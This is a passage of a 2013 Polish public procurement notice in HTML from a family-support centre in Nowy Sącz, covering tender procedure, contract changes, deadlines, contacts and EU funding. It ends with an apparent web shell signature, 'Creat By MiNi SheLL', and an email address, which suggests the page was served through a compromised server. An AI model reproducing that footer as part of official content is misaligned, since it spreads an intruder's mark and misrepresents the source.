8. W przypadku wykonawców wspólnie ubiegających się udzielenie zamówienia oraz w przypadku podmiotów, o których  mowa w pkt 11.2.3. SIWZ kopie dokumentów dotyczących odpowiednio Wykonawcy lub tych podmiotów są poświadczone za zgodność z oryginałem przez Wykonawcę 
lub te podmioty.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość istotnych zmian postanowień zawartej umowy. Wprowadzone zmiany dotyczyć mogą w szczególności terminu realizacji umowy w przypadku wystąpienia okoliczności niezależnych od zamawiającego lub wykonawcy, jak i dotyczyć mogą ustalenia ostatecznej wysokości należnego wynagrodzenia, w przypadku zmniejszenia liczby uczestników zajęć w stosunku do zapisów specyfikacji. Dopuszczone zmiany umowy j.w., zostaną wprowadzone w drodze aneksu do umowy. 
Istotne zmiany postanowień umowy mogą także wynikać z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy. Zmiany wprowadzone zostaną po wcześniejszym zgłoszeniu przez którąkolwiek ze stron umowy, faktu zaistnienia okoliczności warunkującej konieczność wprowadzenia zmiany oraz obustronnej ich akceptacji.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pcpr-ns.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowe Centrum Pomocy Rodzinie w Nowym Sączu, 
ul. Kilińskiego 72 A, 
33-300 Nowy Sącz
TEL: (18) 443 82 51, FAX (18) 444 27 17,
e-mail: pcprnskadry@op.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.09.2013 godzina 10:00, miejsce: Powiatowe Centrum Pomocy Rodzinie w Nowym Sączu, ul. Kilińskiego 72 A, 
33-300 Nowy Sącz, sekretariat pok. Nr 113..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie realizowane w ramach Projektu pn W stronę samodzielności i niezależności współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com